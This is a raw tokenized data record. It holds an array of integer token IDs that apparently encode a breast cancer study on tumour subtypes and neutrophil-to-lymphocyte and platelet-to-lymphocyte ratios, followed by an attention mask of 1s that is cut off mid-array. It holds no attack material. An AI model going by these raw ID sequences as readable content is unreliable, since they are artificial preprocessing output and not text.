29871, 29896, 29947, 29941, 750, 405, 29519, 3551, 29871, 29906, 29889, 29945, 322, 29871, 29955, 29906, 22069, 750, 405, 29519, 29871, 30386, 29871, 29906, 29889, 29945, 29889, 13, 13, 4136, 2277, 29871, 13, 13, 11457, 10070, 26804, 6765, 13, 13, 29871, 26804, 6765, 308, 3436, 713, 259, 3080, 29899, 3317, 13, 29871, 448, 2683, 22158, 448, 26589, 448, 9072, 29899, 13, 29871, 16767, 313, 6360, 29879, 29897, 795, 29945, 29941, 4706, 29906, 29946, 489, 29871, 29955, 29953, 13, 29871, 323, 398, 272, 24235, 965, 29941, 308, 29900, 29889, 29896, 489, 29871, 29896, 29896, 13, 29871, 4737, 579, 2454, 301, 962, 561, 2943, 1678, 29896, 308, 29900, 489, 29871, 29941, 29955, 13, 29871, 14990, 301, 962, 561, 2943, 308, 29896, 29953, 4706, 29896, 489, 29871, 29941, 29955, 13, 29871, 405, 29519, 462, 418, 29906, 29889, 29900, 29896, 418, 29900, 29889, 29941, 29955, 489, 29871, 29941, 29955, 29889, 29896, 13, 29871, 16507, 29934, 462, 418, 29896, 29941, 29955, 29889, 29947, 268, 29941, 29955, 29889, 29896, 489, 29871, 29946, 29906, 29896, 29889, 29941, 13, 13, 20130, 579, 23900, 9825, 459, 493, 5996, 5680, 322, 1014, 8768, 526, 4318, 297, 518, 3562, 29871, 29906, 10514, 29911, 29906, 2597, 999, 29899, 1853, 543, 2371, 29908, 1836, 450, 1556, 3342, 13206, 16637, 1014, 1853, 471, 19703, 979, 1134, 29889, 450, 379, 1001, 29906, 29899, 1066, 3321, 2318, 3633, 287, 363, 29871, 29896, 29929, 29889, 29906, 29995, 310, 599, 22069, 29892, 322, 278, 21954, 29899, 22198, 2318, 3633, 287, 363, 29871, 29896, 29946, 29889, 29896, 15543, 13, 13, 4136, 2277, 29871, 13, 13, 20130, 579, 1815, 2265, 15179, 459, 493, 5996, 5169, 3698, 322, 3323, 8768, 13, 13, 29871, 5169, 3698, 462, 632, 405, 313, 10997, 13, 29871, 448, 2683, 29899, 448, 2683, 448, 1378, 5634, 13, 462, 268, 512, 4428, 573, 868, 312, 284, 1678, 29906, 29900, 29906, 313, 29955, 29929, 29889, 29906, 29897, 13, 29871, 512, 4428, 573, 658, 29890, 1070, 1678, 29896, 29947, 313, 29955, 29889, 29896, 29897, 965, 13, 29871, 438, 3341, 795, 29941, 29945, 313, 29896, 29941, 29889, 29955, 29897, 3986, 13, 29871, 24906, 313, 29876, 353, 29871, 29906, 29945, 29945, 29897, 462, 539, 13, 462, 418, 29896, 29909, 462, 29906, 29929, 313, 29896, 29896, 29889, 29946, 29897, 13, 259, 29896, 29933, 462, 29871, 29946, 313, 29896, 29889, 29953, 29897, 9651, 13, 259, 29906, 29909, 462, 29871, 29953, 29900, 313, 29906, 29941, 29889, 29945, 29897, 3986, 13, 259, 29906, 29933, 462, 29871, 29945, 29906, 313, 29906, 29900, 29889, 29946, 29897, 3986, 13, 259, 29941, 29909, 462, 29871, 29945, 29900, 313, 29896, 29929, 29889, 29953, 29897, 3986, 13, 259, 29941, 29933, 462, 29871, 29906, 29945, 313, 29929, 29889, 29947, 29897, 965, 13, 259, 29941, 29907, 462, 29871, 29906, 29947, 313, 29896, 29896, 29897, 9651, 13, 259, 29946, 462, 259, 29955, 313, 29906, 29889, 29955, 29897, 9651, 13, 29871, 8982, 462, 10321, 3321, 965, 29896, 29929, 29945, 313, 29955, 29953, 29889, 29945, 29897, 13, 29871, 12610, 1230, 9651, 29953, 29900, 313, 29906, 29941, 29889, 29945, 29897, 3986, 13, 29871, 12089, 462, 10321, 3321, 965, 29896, 29955, 29900, 313, 29953, 29953, 29889, 29955, 29897, 13, 29871, 12610, 1230, 9651, 29947, 29945, 313, 29941, 29941, 29889, 29941, 29897, 3986, 13, 29871, 10580, 29890, 29899, 29933, 29906, 9651, 10321, 3321, 965, 29946, 29929, 313, 29906, 29900, 29889, 29946, 29897, 13, 29871, 12610, 1230, 9651, 29906, 29900, 29953, 313, 29955, 29929, 29889, 29953, 29897, 308, 13, 29871, 3323, 1853, 9651, 365, 398, 979, 9651, 29896, 29955, 29900, 313, 29953, 29953, 29889, 29955, 29897, 13, 29871, 379, 1001, 29906, 6374, 539, 29946, 29929, 313, 29896, 29929, 29889, 29906, 29897, 3986, 13, 29871, 8602, 552, 8178, 268, 29941, 29953, 313, 29896, 29946, 29889, 29896, 29897, 3986, 13, 13, 7390, 29934, 471, 13686, 3598, 8855, 630, 411, 21622, 272, 2159, 322, 5046, 29889, 1670, 892, 694, 7282, 8855, 800, 4249, 405, 29519, 470, 16507, 29934, 322, 1539, 579, 2454, 301, 962, 561, 2943, 2302, 29892, 3001, 301, 962, 561, 2943, 2302, 29892, 470, 16540, 29899, 29953, 29955, 4660, 9310, 3562, 29871, 29941, 10514, 29911, 29941, 2597, 999, 29899, 1853, 543, 2371, 29908, 7690, 13, 13, 4136, 2277, 29871, 13, 13, 29911, 398, 272, 26804, 6765, 322, 405, 29519, 29914, 7390, 29934, 2994, 23445, 13, 13, 29871, 9586, 1849, 1669, 405, 29519, 462, 1678, 16507, 29934, 13, 29871, 448, 2683, 22158, 448, 2683, 23648, 448, 2683, 23648, 13, 29871, 16767, 313, 6360, 29879, 29897, 632, 364, 353, 13935, 29900, 29889, 29900, 29906, 29896, 349, 353, 29871, 29900, 29889, 29955, 29941, 29946, 259, 364, 353, 13935, 29900, 29889, 29896, 29953, 29953, 349, 353, 29871, 29900, 29889, 29900, 29900, 29947, 13, 29871, 323, 398, 272, 24235, 3986, 364, 353, 13935, 29900, 29889, 29900, 29929, 29896, 349, 353, 29871, 29900, 29889, 29896, 29946, 29929, 259, 364, 353, 29871, 29900, 29889, 29896, 29941, 29947, 349, 353, 29871, 29900, 29889, 29900, 29906, 29947, 13, 29871, 4737, 579, 2454, 301, 962, 561, 2943, 259, 364, 353, 29871, 29900, 29889, 29900, 29953, 29947, 349, 353, 29871, 29900, 29889, 29906, 29955, 29953, 1678, 364, 353, 29871, 29900, 29889, 29900, 29955, 29945, 349, 353, 29871, 29900, 29889, 29906, 29941, 29941, 13, 29871, 14990, 301, 962, 561, 2943, 4706, 364, 353, 13935, 29900, 29889, 29900, 29953, 29900, 349, 353, 29871, 29900, 29889, 29941, 29941, 29947, 259, 364, 353, 13935, 29900, 29889, 29900, 29953, 29896, 349, 353, 29871, 29900, 29889, 29941, 29941, 29946, 13, 29871, 16540, 29899, 29953, 29955, 462, 259, 364, 353, 13935, 29900, 29889, 29900, 29896, 29945, 349, 353, 29871, 29900, 29889, 29947, 29955, 29945, 259, 364, 353, 29871, 29900, 29889, 29900, 29900, 29945, 349, 353, 29871, 29900, 29889, 29929, 29953, 29896, 13, 13, 1576, 27733, 4249, 405, 29519, 322, 24899, 293, 459, 493, 5996, 3651, 526, 4318, 297, 518, 3562, 29871, 29946, 10514, 29911, 29946, 2597, 999, 29899, 1853, 543, 2371, 29908, 1836, 405, 29519, 750, 694, 12997, 1711, 7282, 27733, 411, 5046, 29892, 379, 1001, 29906, 4603, 4660, 29892, 470, 298, 555, 650, 337, 14268, 13686, 2068, 29889, 1670, 471, 694, 12651, 297, 21622, 272, 2159, 29936, 8982, 29892, 12089, 29892, 322, 5147, 29890, 29933, 29906, 4660, 29936, 9825, 5996, 19468, 29936, 322, 301, 962, 561, 586, 6151, 1070, 322, 639, 457, 3631, 28425, 1546, 278, 4482, 29899, 322, 1880, 29899, 25103, 29934, 6471, 29889, 13, 13, 4136, 2277, 29871, 13, 13, 29911, 398, 272, 322, 4121, 993, 26804, 6765, 491, 405, 29519, 13, 13, 29871, 26804, 6765, 3986, 405, 29519, 259, 334, 29925, 29930, 462, 3986, 13, 29871, 448, 2683, 26589, 448, 807, 448, 9072, 448, 9072, 448, 22158, 13, 29871, 16767, 313, 6360, 29879, 29897, 1669, 29906, 29945, 29945, 1678, 29945, 29945, 313, 29906, 29955, 489, 29955, 29945, 29897, 1678, 29945, 29941, 313, 29906, 29953, 489, 29955, 29945, 29897, 1678, 29900, 29889, 29953, 29929, 13, 29871, 323, 398, 272, 2159, 18884, 29906, 29945, 29945, 1678, 29941, 313, 29900, 29889, 29896, 489, 29896, 29896, 29897, 1678, 29941, 313, 29900, 29889, 29906, 489, 29896, 29896, 29897, 1678, 29900, 29889, 29906, 29941, 29906, 13, 29871, 4737, 579, 2454, 301, 962, 561, 2943, 268, 29906, 29945, 29945, 1678, 29896, 313, 29900, 489, 29941, 29955, 29897, 418, 29906, 313, 29900, 489, 29906, 29941, 29897, 418, 29900, 29889, 29946, 29900, 29953, 13, 29871, 14990, 301, 962, 561, 2943, 3986, 29906, 29945, 29945, 1678, 29896, 29955, 313, 29896, 489, 29941, 29955, 29897, 268, 29896, 29946, 313, 29941, 489, 29941, 29946, 29897, 268, 29900, 29889, 29896, 29906, 29941, 13, 29871, 15179, 5996, 19468, 4706, 29906, 29896, 29906, 1678, 29896, 29945, 29900, 9651, 29953, 29906, 632, 13, 259, 30363, 29954, 15464, 29871, 29896, 462, 29871, 29906, 29906, 268, 29896, 29947, 313, 29896, 29906, 29889, 29900, 29897, 418, 29946, 313, 29953, 29889, 29945, 29897, 4706, 29900, 29889, 29946, 29896, 29906, 13, 259, 30363, 29954, 15464, 29871, 29906, 462, 29871, 29929, 29929, 268, 29953, 29955, 313, 29946, 29946, 29889, 29955, 29897, 418, 29941, 29906, 313, 29945, 29896, 29889, 29953, 29897, 418, 13, 259, 30363, 29954, 15464, 29871, 29941, 462, 29871, 29929, 29896, 268, 29953, 29945, 313, 29946, 29941, 29889, 29941, 29897, 418, 29906, 29953, 313, 29946, 29896, 29889, 29929, 29897, 418, 13, 29871, 16206, 29888, 586, 6151, 1070, 28425, 1678, 29896, 29947, 29953, 1678, 29896, 29941, 29900, 9651, 29945, 29953, 632, 13, 259, 30363, 3782, 462, 539, 29946, 29953, 268, 29906, 29929, 313, 29906, 29906, 29889, 29941, 29897, 418, 29896, 29955, 313, 29941, 29900, 29889, 29946, 29897, 418, 29900, 29889, 29941, 29906, 29953, 13, 259, 30363, 8241, 462, 418, 29896, 29946, 29900, 1678, 29896, 29900, 29896, 313, 29955, 29955, 29889, 29955, 29897, 268, 29941, 29929, 313, 29953, 29929, 29889, 29953, 29897, 418, 13, 29871, 2431, 457, 3631, 28425, 539, 29896, 29941, 29929, 1678, 29929, 29929, 632, 29946, 29900, 632, 13, 259, 30363, 3782, 462, 539, 29955, 29945, 268, 29945, 29953, 313, 29945, 29953, 29889, 29953, 29897, 418, 29896, 29929, 313, 29946, 29955, 29889, 29945, 29897, 418, 29900, 29889, 29946, 29941, 29946, 13, 259, 30363, 8241, 462, 418, 29953, 29946, 268, 29946, 29941, 313, 29946, 29941, 29889, 29946, 29897, 418, 29906, 29896, 313, 29945, 29906, 29889, 29945, 29897, 418, 13, 29871, 8982, 462, 4706, 29906, 29945, 29945, 462, 18884, 13, 259, 30363, 29940, 387, 1230, 462, 29953, 29900, 268, 29946, 29955, 313, 29906, 29945, 29889, 29955, 29897, 418, 29896, 29941, 313, 29896, 29947, 29889, 29896, 29897, 418, 29900, 29889, 29906, 29945, 29929, 13, 259, 30363, 9135, 3321, 462, 29896, 29929, 29945, 1678, 29896, 29941, 29953, 313, 29955, 29946, 29889, 29941, 29897, 268, 29945, 29929, 313, 29947, 29896, 29889, 29929, 29897, 418, 13, 29871, 12089, 462, 4706, 29906, 29945, 29945, 462, 18884, 13, 259, 30363, 29940, 387, 1230, 462, 29947, 29945, 268, 29953, 29945, 313, 29941, 29945, 29889, 29945, 29897, 418, 29906, 29900, 313, 29906, 29955, 29889, 29947, 29897, 418, 29900, 29889, 29941, 29900, 29906, 13, 259, 30363, 9135, 3321, 462, 29896, 29955, 29900, 1678, 29896, 29896, 29947, 313, 29953, 29946, 29889, 29945, 29897, 268, 29945, 29906, 313, 29955, 29906, 29889, 29906, 29897, 418, 13, 29871, 10580, 29890, 350, 29906, 462, 259, 29906, 29945, 29906, 1678, 29896, 29947, 29896, 9651, 29955, 29896, 632, 13, 259, 30363, 29940, 387, 1230, 462, 29906, 29900, 29941, 1678, 29896, 29946, 29896, 313, 29955, 29955, 29889, 29929, 29897, 268, 29953, 29906, 313, 29947, 29955, 29889, 29941, 29897, 418, 29900, 29889, 29896, 29906, 29947, 13, 259, 30363, 9135, 3321, 462, 29946, 29929, 268, 29946, 29900, 313, 29906, 29906, 29889, 29896, 29897, 418, 29929, 313, 29896, 29906, 29889, 29955, 29897, 539, 13, 13, 8439, 892, 694, 7282, 12651, 297, 278, 405, 29519, 322, 16507, 29934, 1819, 4249, 278, 19703, 979, 1134, 29892, 379, 1001, 29906, 29899, 1066, 3321, 29892, 470, 21954, 29899, 22198, 21622, 943, 9310, 3562, 29871, 29945, 10514, 29911, 29945, 2597, 999, 29899, 1853, 543, 2371, 29908, 7690, 13, 13, 4136, 2277, 29871, 13, 13, 20130, 579, 1815, 2265, 3323, 8768, 7579, 304, 17511, 29899, 322, 5057, 29899, 25103, 29934, 2630, 1041, 13, 13, 29871, 3323, 1853, 965, 405, 29519, 3986, 334, 29925, 29930, 3986, 13, 29871, 448, 2683, 448, 1378, 5634, 448, 28400, 448, 22158, 13, 29871, 365, 398, 979, 9651, 29896, 29896, 29941, 313, 29953, 29953, 29889, 29929, 29897, 1678, 29945, 29953, 313, 29941, 29941, 29889, 29896, 29897, 1678, 29900, 29889, 29900, 29945, 29896, 13, 29871, 379, 1001, 29906, 6374, 418, 29946, 29896, 313, 29947, 29906, 29897, 539, 29929, 313, 29896, 29947, 29897, 539, 13, 29871, 8602, 552, 8178, 1678, 29906, 29929, 313, 29947, 29900, 29889, 29953, 29897, 268, 29955, 313, 29896, 29929, 29889, 29946, 29897, 268, 13, 13, 4205, 17348, 426, 29937, 3471, 29896, 29899, 29946, 29913, 13, 4936, 1360, 13, 13, 797, 445, 6559, 29892, 591, 4392, 1312, 278, 21702, 4249, 24207, 23900, 1014, 8768, 322, 278, 405, 29519, 322, 16507, 29934, 408, 4221, 4097, 310, 4414, 4850, 362, 29889, 21882, 11898, 505, 4318, 393, 29892, 9401, 411, 278, 19703, 979, 319, 1014, 1853, 29892, 278, 21954, 29899, 22198, 322, 379, 1001, 29906, 29899, 264, 4018, 287, 24207, 23900, 1014, 8768, 526, 901, 5198, 348, 6352, 293, 322, 6942, 411, 6460, 261, 410, 5138, 19263, 313, 29931, 5871, 29892, 29871, 29906, 29900, 29896, 29946, 467, 319, 11553, 19783, 309, 293, 3495, 2933, 304, 21622, 272, 756, 884, 1063, 6942, 411, 6460, 410, 5138, 19263, 1363, 372, 508, 297, 6335, 277, 278, 5198, 1540, 1788, 491, 21301, 292, 278, 274, 3637, 327, 2251, 293, 6354, 310, 323, 9101, 29889, 1334, 13752, 267, 1891, 393, 278, 7426, 310, 4414, 314, 2922, 706, 2933, 29892, 408, 18694, 491, 405, 29519, 29892, 1122, 367, 1422, 4249, 24207, 23900, 1014, 8768, 29889, 1334, 1033, 451, 1284, 738, 12651, 297, 405, 29519, 322, 16507, 29934, 1819, 4249, 24207, 23900, 1014, 8768, 29892, 3704, 21954, 29899, 22198, 322, 379, 1001, 29906, 29899, 1066, 3321, 1014, 8768, 29889, 13, 13, 29903, 1310, 284, 11898, 505, 28585, 21702, 1546, 278, 4414, 314, 2922, 706, 1788, 322, 23900, 29889, 349, 2267, 276, 271, 358, 11553, 19783, 309, 29892, 301, 962, 561, 22502, 371, 29892, 322, 15284, 1026, 18139, 526, 4221, 4097, 310, 23900, 29899, 21264, 630, 4414, 4850, 362, 29889, 5057, 11553, 19783, 309, 2302, 756, 1063, 28585, 304, 367, 385, 7417, 410, 5138, 520, 293, 17456, 363, 23900, 1162, 26841, 322, 10503, 2561, 29892, 3704, 330, 7614, 293, 23900, 29892, 1539, 579, 2454, 4325, 284, 3038, 1559, 16381, 4125, 29892, 1539, 579, 2454, 9232, 273, 4125, 29892, 322, 12862, 1661, 29899, 9278, 3038, 13030, 23900, 313, 29967, 423, 634, 394, 1696, 29871, 29906, 29900, 29896, 29945, 29936, 2718, 634, 394, 1696, 29871, 29906, 29900, 29896, 29945, 29936, 624, 327, 29920, 634, 394, 1696, 29871, 29906, 29900, 29896, 29941, 29936, 306, 845, 466, 22971, 634, 394, 1696, 29871, 29906, 29900, 29896, 29941, 29936, 349, 996, 634, 394, 1696, 29871, 29906, 29900, 29896, 29945, 29936, 12931, 634, 394, 1696, 29871, 29906, 29900, 29896, 29945, 467, 450, 14881, 1546, 11553, 19783, 309, 322, 301, 962, 561, 22502, 371, 4414, 314, 2922, 706, 20890, 756, 263, 12187, 6297, 297, 1559, 16381, 6352, 6656, 29889, 450, 13336, 14407, 278, 9443, 1546, 263, 1880, 405, 29519, 322, 6460, 21957, 297, 24207, 23900, 338, 451, 6446, 11098, 29889, 319, 1773, 7060, 9020, 1889, 756, 1063, 13752, 267, 1891, 304, 5649, 278, 9443, 1546, 1880, 405, 29519, 322, 6460, 410, 5138, 19263, 29889, 2448, 329, 19783, 2719, 1122, 1044, 408, 21622, 272, 29899, 14032, 11427, 454, 2679, 22502, 2167, 322, 367, 15390, 310, 297, 6335, 11407, 278, 5198, 1540, 1788, 3025, 1462, 23881, 310, 278, 274, 3637, 324, 3637, 293, 6354, 310, 301, 962, 561, 22502, 2167, 29892, 5613, 413, 5495, 9101, 29892, 322, 5039, 630, 323, 29899, 3729, 29879, 29889, 2448, 329, 19783, 2719, 27391, 24993, 482, 310, 21622, 272, 9101, 322, 1095, 720, 295, 616, 9101, 964, 278, 18342, 362, 29892, 27999, 17737, 17068, 304, 2654, 8684, 310, 278, 4414, 314, 2922, 706, 2933, 297, 263, 21622, 272, 29899, 14032, 11427, 5305, 313, 29954, 2741, 15067, 634, 394, 1696, 29871, 29906, 29900, 29896, 29941, 467, 2448, 329, 19783, 2719, 508, 884, 409, 9084, 18342, 1218, 325, 6151, 1070, 1095, 720, 295, 616, 14321, 7329, 393, 2504, 4769, 21622, 272, 5849, 313, 29933, 2235, 14043, 634, 394, 1696, 29871, 29906, 29900, 29896, 29906, 416, 5480, 29892, 385, 11858, 630, 11553, 19783, 309, 2302, 508, 20436, 5987, 21622, 272, 2614, 29875, 6352, 6656, 322, 29126, 304, 17135, 410, 11476, 29892, 4550, 8236, 304, 263, 8178, 19869, 1546, 11553, 19783, 309, 9027, 322, 16500, 10503, 2561, 29889, 2448, 329, 19783, 11836, 508, 884, 367, 2861, 304, 610, 1662, 459, 4230, 293, 5802, 310, 590, 295, 3398, 14321, 13879, 7371, 491, 23900, 313, 29911, 261, 314, 22971, 29875, 634, 394, 1696, 29871, 29906, 29900, 29900, 29929, 467, 4525, 13879, 297, 6335, 277, 16798, 415, 19263, 310, 21622, 272, 9101, 3025, 20346, 7329, 23297, 26229, 29889, 4525, 4959, 26371, 749, 2614, 29875, 6352, 6656, 29892, 21622, 272, 14321, 29892, 322, 410, 11476, 304, 263, 1539, 579, 2454, 17292, 327, 668, 313, 2182, 737, 322, 26515, 346, 29892, 29871, 29906, 29900, 29896, 29941, 467, 6549, 29892, 278, 405, 29519, 508, 9432, 278, 17346, 1546, 26229, 310, 278, 4414, 314, 2922, 706, 2224, 1582, 322, 278, 9418, 29899, 29873, 398, 272, 5198, 1540, 740, 297, 24207, 23900, 29889, 13, 13, 4920, 14977, 11553, 19783, 309, 322, 301, 962, 561, 22502, 371, 3694, 1122, 367, 28482, 491, 5164, 4824, 29875, 5996, 29892, 2224, 5996, 29892, 322, 9128, 13879, 29889, 2398, 29892, 405, 29519, 756, 1063, 4318, 304, 3933, 901, 13714, 1135, 916, 454, 2679, 22502, 371, 4128, 29889, 405, 29519, 322, 16507, 29934, 526, 5948, 3625, 2560, 29320, 2729, 373, 4796, 10416, 3038, 2302, 322, 15284, 1026, 3694, 393, 12266, 1014, 695, 262, 936, 4414, 4850, 362, 29889, 405, 1148, 634, 394, 1696, 313, 29906, 29900, 29896, 29941, 29897, 1476, 393, 11858, 630, 405, 29519, 472, 2847, 24899, 936, 24329, 310, 24207, 23900, 471, 385, 7417, 7329, 363, 6460, 10503, 2561, 6554, 297, 24207, 23900, 22069, 29889, 512, 6124, 29892, 612, 6241, 634, 394, 29889, 10018, 393, 11858, 630, 405, 29519, 313, 30386, 29906, 29889, 29945, 29897, 322, 390, 29928, 29956, 892, 16951, 6942, 411, 6460, 410, 5138, 19263, 313, 29979, 6241, 634, 394, 1696, 29871, 29906, 29900, 29896, 29946, 467, 512, 445, 6559, 29892, 591, 8560, 263, 16165, 441, 310, 24207, 23900, 22069, 304, 14707, 278, 405, 29519, 322, 16507, 29934, 1819, 297, 1422, 13206, 16637, 1014, 8768, 310, 24207, 23900, 29889, 13, 13, 29903, 1310, 284, 11898, 505, 8967, 1422, 714, 26807, 5034, 304, 405, 29519, 1819, 1546, 24207, 23900, 1014, 8768, 29889, 28590, 634, 394, 1696, 313, 29906, 29900, 29896, 29946, 29897, 19030, 29871, 29896, 29945, 29955, 298, 555, 650, 337, 14268, 29899, 1066, 3321, 379, 1001, 29906, 29899, 22198, 24207, 23900, 22069, 14914, 411, 452, 29877, 26859, 4090, 424, 8950, 1228, 27580, 29892, 411, 263, 2099, 1101, 29899, 786, 310, 29871, 29906, 29896, 7378, 1156, 25300, 708, 29889, 2688, 10018, 393, 263, 405, 29519, 320, 29958, 29871, 29906, 29889, 29906, 29945, 471, 6942, 411, 20511, 1162, 26841, 29899, 9021, 322, 12463, 10503, 2561, 313, 3267, 29897, 322, 471, 385, 7417, 12045, 7329, 363, 1162, 26841, 322, 5758, 2877, 29889, 13, 13, 29911, 29940, 5371, 29879, 1510, 2531, 7492, 832, 3097, 8236, 304, 385, 7910, 297, 278, 1353, 310, 5478, 800, 29889, 3599, 296, 11898, 505, 4318, 393, 1788, 293, 4414, 314, 2922, 706, 4128, 1033, 367, 8444, 363, 8500, 292, 714, 26807, 310, 323, 29940, 5371, 22069, 29889, 349, 391, 5481, 634, 394, 1696, 313, 29906, 29900, 29896, 29945, 29897, 29537, 287, 29871, 29929, 29900, 22069, 411, 4688, 323, 29940, 5371, 304, 14707, 278, 8855, 800, 310, 405, 29519, 1434, 14502, 411, 17135, 29899, 9021, 10503, 2561, 313, 4037, 29903, 29897, 322, 6570, 29889, 2688, 10018, 393, 22069, 411, 263, 405, 29519, 320, 29958, 29871, 29941, 750, 20511, 360, 9998, 322, 6570, 1135, 1906, 310, 22069, 411, 263, 405, 29519, 29871, 30248, 29871, 29941, 29889, 435, 423, 634, 394, 1696, 313, 29906, 29900, 29896, 29945, 29897, 8967, 393, 263, 1880, 405, 29519, 1434, 14502, 471, 25499, 6942, 411, 263, 15029, 410, 5138, 19263, 363, 323, 29940, 5371, 29889, 323, 29940, 5371, 29879, 505, 20853, 293, 832, 3097, 29892, 577, 896, 505, 263, 260, 5197, 304, 5706, 452, 29877, 424, 335, 575, 322, 1121, 297, 263, 25745, 23724, 4766, 310, 5198, 1540, 297, 1777, 509, 362, 29889, 13, 13, 1576, 24899, 293, 459, 493, 5996, 5680, 6942, 411, 1880, 405, 29519, 1819, 892, 11664, 323, 7408, 29892, 20023, 5046, 29892, 322, 6374, 379, 1001, 29906, 4660, 29889, 4709, 370, 634, 394, 1696, 313, 29906, 29900, 29896, 29941, 29897, 19030, 278, 410, 5138, 520, 293, 11509, 310, 278, 405, 29519, 297, 29871, 29946, 29900, 29900, 17403, 22069, 322, 10018, 393, 22069, 411, 263, 6133, 405, 29519, 892, 9642, 322, 750, 901, 301, 962, 561, 2943, 5297, 29841, 322, 1539, 579, 2129, 19378, 2185, 634, 394, 1696, 313, 29906, 29900, 29896, 29945, 29897, 10018, 393, 21622, 272, 10809, 313, 29886, 29911, 511, 18778, 284, 4660, 29892, 3082, 435, 2461, 12930, 373, 1815, 2265, 380, 6751, 313, 262, 1037, 5832, 2224, 5996, 7408, 511, 322, 21188, 1539, 579, 25101, 4660, 892, 1476, 304, 367, 16951, 6942, 411, 1880, 405, 29519, 29889, 1334, 1476, 393, 6133, 16507, 29934, 1819, 892, 6942, 411, 5046, 322, 21622, 272, 24235, 29892, 541, 591, 1258, 451, 1284, 738, 8855, 800, 4249, 405, 29519, 322, 24899, 293, 459, 493, 5996, 5680, 29889, 501, 3333, 634, 394, 1696, 313, 29906, 29900, 29896, 29945, 29897, 1258, 451, 12439, 738, 7282, 8855, 800, 4249, 24899, 936, 322, 2224, 5996, 4128, 322, 278, 405, 29519, 297, 22069, 411, 17403, 29889, 13, 13, 29949, 332, 6559, 750, 777, 27028, 393, 881, 367, 11682, 29889, 319, 11910, 310, 278, 848, 471, 4567, 1363, 310, 278, 3240, 1883, 12645, 5469, 310, 278, 6559, 29889, 450, 16540, 29871, 29953, 29955, 995, 471, 451, 6161, 519, 297, 599, 22069, 29892, 577, 1906, 411, 19703, 979, 1014, 8768, 892, 451, 13931, 964, 365, 398, 979, 319, 322, 365, 398, 979, 350, 1014, 13155, 29889, 13, 13, 797, 15997, 29892, 758, 2484, 271, 358, 405, 29519, 322, 16507, 29934, 1819, 892, 451, 6942, 411, 21622, 272, 1014, 1853, 297, 24207, 23900, 22069, 29889, 1019, 29879, 12645, 11898, 411, 7200, 16500, 3694, 322, 410, 5138, 520, 293, 848, 674, 1207, 372, 1950, 304, 4017, 901, 23279, 2582, 29889, 13, 13, 16376, 506, 1372, 310, 23829, 426, 29937, 3471, 29906, 29899, 29906, 29913, 13, 2683, 23648, 13, 13, 8516, 310, 278, 15717, 756, 263, 14529, 310, 4066, 4475, 304, 445, 6559, 29889, 13, 13, 4013, 6559, 471, 451, 6969, 491, 738, 12666, 470, 5001, 29889, 13 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 